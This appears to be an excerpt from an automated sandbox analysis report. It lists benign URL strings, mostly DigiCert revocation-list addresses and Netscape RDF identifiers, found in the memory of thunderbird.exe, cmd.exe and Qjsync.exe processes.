Source: thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Account
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#BiffState
Source: thunderbird.exe, 00000004.00000000.2264998522.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#BookmarkSeparator
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#BookmarkSeparatornaturaldescendingascendingundeterminednsTreeRowTest
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CanCompact
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CanCreateFoldersOnServer
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CanCreateSubfolders
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CanFileMessages
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CanFileMessagesOnServer
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CanGetIncomingMessages
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CanGetMessages
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CanRename
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CanSearchMessages
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CanSubscribe
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CardChild
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Charset
Source: thunderbird.exe, 00000003.00000000.2157387676.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000002.2265907816.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422053504.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp, thunderbird.exe, 00000004.00000000.2264998522.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CharsetDetector
Source: thunderbird.exe, 00000003.00000000.2157387676.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000002.2265907816.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422053504.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp, thunderbird.exe, 00000004.00000000.2264998522.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Checked
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Compact
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CompactAll
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Content-Length
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Copy
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CopyFolder
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#DateEnded
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#DateStarted
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Delete
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#DeleteCards
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#DeleteCardshttp://home.netscape.com/NC-rdf#DirTreeNameSorthttp://hom
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Deletehttp://home.netscape.com/NC-rdf#Copyhttp://home.netscape.com/N
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#DirName
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#DirTreeNameSort
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#DirUri
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#DownloadFlaggedMessages
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#DownloadFlaggedMessageshttp://home.netscape.com/NC-rdf#MarkAllMessag
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#DownloadState
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#EmptyTrash
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Enabled
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Enabledfilter;filterName=filterName=MsgBiffinserting
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#File
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#FileSystemObject
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Folder
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#FolderSize
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#FolderTreeName
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#FolderTreeName?sort=true
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#FolderTreeSimpleName
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#GetNewMessages
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#HasUnreadMessages
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IEFavorite
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IEFavoriteFolder
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Icon
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IconURL
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Identity
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#ImapShared
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#InVFEditSearchScope
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IsDefaultServer
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IsDeferred
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IsDirectory
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IsMailList
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IsRemote
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IsSecure
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IsServer
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IsSessionDefaultServer
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IsSessionDefaultServerNC:smtpservershttp://home.netscape.com/NC-rdf#
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IsWriteable
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Junk
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Key
Source: thunderbird.exe, 00000003.00000000.2157387676.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000002.2265907816.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422053504.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp, thunderbird.exe, 00000004.00000000.2264998522.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#KeyIndex
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#LeafName
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#MarkAllMessagesRead
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Modify
